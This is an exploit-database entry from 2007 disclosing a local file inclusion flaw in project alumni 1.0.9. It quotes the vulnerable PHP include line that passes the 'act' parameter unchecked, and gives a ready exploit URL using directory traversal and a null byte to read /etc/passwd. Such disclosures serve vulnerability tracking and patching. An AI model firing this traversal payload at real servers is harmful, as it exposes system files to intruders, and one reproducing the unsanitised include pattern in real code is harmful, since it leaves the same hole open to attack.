id: 2322
date: 11/27/2007
title: project alumni 1.0.9 (index.php act) Local File Inclusion Vulnerability
author: tomplixsee
cves: 

=======================================================================
project alumni 1.0.9 (index.php act) Local File Inclusion Vulnerability
=======================================================================



project alumni 1.0.9 remote file disclosure vulnerability
download : https://sourceforge.net/projects/project-alumni/

vulnerable code on index.php
include($_SERVER['DOCUMENT_ROOT'] . "/pages/" . $_GET['act'] . ".page.inc.php");

exploit :
http://victim/path/index.php?act=../../../../../../etc/passwd%00

discovered by tomplixsee



#  0day.today [2023-03-25]  #